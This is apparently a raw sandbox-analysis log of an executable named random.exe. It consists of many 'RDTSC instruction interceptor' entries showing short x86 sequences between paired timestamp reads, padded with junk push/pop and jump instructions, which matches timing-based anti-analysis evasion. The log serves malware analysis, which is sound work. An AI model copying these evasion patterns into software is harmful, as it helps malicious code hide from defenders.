Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A2BDCC second address: A2BDE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F5FF4F1244Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A2C251 second address: A2C257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A2C257 second address: A2C25D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A2C25D second address: A2C263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A2C263 second address: A2C28F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5FF4F1244Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F5FF4F12458h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A2C28F second address: A2C2A3 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5FF4AFEFF6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A2C2A3 second address: A2C2A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A2C2A7 second address: A2C2B7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5FF4AFEFF6h 0x00000008 jg 00007F5FF4AFEFF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A2C41F second address: A2C423 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A2C423 second address: A2C42B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A2C6F5 second address: A2C723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 jnc 00007F5FF4F1245Eh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A2C723 second address: A2C73E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4AFF003h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A2C73E second address: A2C742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A2B520 second address: A2B52E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A2B52E second address: A2B532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A2B532 second address: A2B53B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A2B53B second address: A2B540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A2B540 second address: A2B546 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A2B546 second address: A2B54A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A2B54A second address: A2B553 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A32FD4 second address: A32FD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A32FD8 second address: A32FFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4AFF000h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F5FF4AFEFFFh 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A37ADB second address: A37AEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007F5FF4F12446h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A37C55 second address: A37C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A37C5B second address: A37C65 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5FF4F12446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A44833 second address: A4483A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A44986 second address: A449A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F12451h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A449A4 second address: A449AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A47A69 second address: A47A6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A47A6D second address: A47A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A4759F second address: A475C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F5FF4F1244Eh 0x0000000d pushad 0x0000000e jmp 00007F5FF4F1244Ch 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A4A16E second address: A4A17B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A4A17B second address: A4A17F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A4A17F second address: A4A183 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A51F7A second address: A51F80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A51F80 second address: A51F84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A51F84 second address: A51F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F5FF4F12448h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A51F92 second address: A51F9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A51F9A second address: A51FA6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A5B510 second address: A5B51B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5FF4AFEFF6h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A5B51B second address: A5B527 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5FF4F1244Eh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A5B527 second address: A5B576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5FF4AFF009h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007F5FF4AFF02Ah 0x00000011 jbe 00007F5FF4AFF014h 0x00000017 jl 00007F5FF4AFEFF6h 0x0000001d jmp 00007F5FF4AFF008h 0x00000022 push eax 0x00000023 push edx 0x00000024 push edx 0x00000025 pop edx 0x00000026 push edi 0x00000027 pop edi 0x00000028 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A5B3A4 second address: A5B3A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A5B3A8 second address: A5B3AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A5B3AE second address: A5B3B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A5B3B3 second address: A5B3BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A64946 second address: A64958 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5FF4F12446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F5FF4F1244Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A63474 second address: A6347E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5FF4AFEFF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A6347E second address: A63496 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5FF4F12452h 0x00000008 jns 00007F5FF4F12446h 0x0000000e jbe 00007F5FF4F12446h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A63496 second address: A6349C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A6374D second address: A6375D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5FF4F12446h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A638E4 second address: A638F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5FF4AFEFFFh 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A638F8 second address: A638FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A638FE second address: A63902 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A63902 second address: A63911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5FF4F12446h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A63B84 second address: A63B8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A63B8A second address: A63B8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A6469A second address: A646A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A646A5 second address: A646A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A646A9 second address: A646AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 972A53 second address: 972A59 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 972A59 second address: 972A72 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5FF4AFEFF8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b jmp 00007F5FF4AFEFFCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 972A72 second address: 972A78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A69509 second address: A69514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5FF4AFEFF6h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A69514 second address: A6953D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F1244Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c jmp 00007F5FF4F12451h 0x00000011 pushad 0x00000012 popad 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A6953D second address: A69563 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5FF4AFF010h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A69563 second address: A6957B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5FF4F12454h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A7B46D second address: A7B476 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A75203 second address: A7526E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007F5FF4F12451h 0x0000000b pop edx 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F5FF4F12458h 0x00000013 push edi 0x00000014 jnl 00007F5FF4F12446h 0x0000001a pop edi 0x0000001b push ecx 0x0000001c jmp 00007F5FF4F12457h 0x00000021 jmp 00007F5FF4F12454h 0x00000026 pop ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a pop eax 0x0000002b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A881C4 second address: A881E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5FF4AFEFFFh 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5FF4AFEFFCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A881E6 second address: A881FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F12454h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A881FE second address: A88204 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A88204 second address: A8820A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A8820A second address: A8820E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A8820E second address: A88219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A88219 second address: A8822F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5FF4AFF000h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A88075 second address: A8807B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A8AED6 second address: A8AEDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A8AEDC second address: A8AEE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A8AEE0 second address: A8AEEA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5FF4AFEFFEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A8AADF second address: A8AB03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F5FF4F12458h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A9EC04 second address: A9EC1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FF4AFEFFCh 0x00000009 jl 00007F5FF4AFEFF6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A9EF15 second address: A9EF49 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 jmp 00007F5FF4F12452h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5FF4F12458h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A9F0AC second address: A9F0BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4AFEFFAh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A9F0BF second address: A9F0C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A9F0C5 second address: A9F0CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: A9F20B second address: A9F232 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F1244Eh 0x00000007 jmp 00007F5FF4F1244Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007F5FF4F12446h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: AA0E65 second address: AA0E6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: AA0E6B second address: AA0E95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F5FF4F12452h 0x0000000d pushad 0x0000000e popad 0x0000000f jno 00007F5FF4F12446h 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: AA0E95 second address: AA0E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: AA0E99 second address: AA0ED1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F12455h 0x00000007 jp 00007F5FF4F12446h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F5FF4F12459h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: AA0ED1 second address: AA0ED6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: AA3974 second address: AA398A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5FF4F12446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c jg 00007F5FF4F12450h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: AA3D6F second address: AA3D74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: AA3D74 second address: AA3D88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FF4F12450h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: AA3D88 second address: AA3D8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BE0738 second address: 4BE0772 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F12459h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5FF4F12458h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BE0772 second address: 4BE0776 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BE0776 second address: 4BE077C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BE0886 second address: 4BE08C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4AFEFFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push esi 0x00000012 jmp 00007F5FF4AFEFFDh 0x00000017 pop ecx 0x00000018 popad 0x00000019 lea eax, dword ptr [ebp-04h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F5FF4AFEFFAh 0x00000023 rdtsc
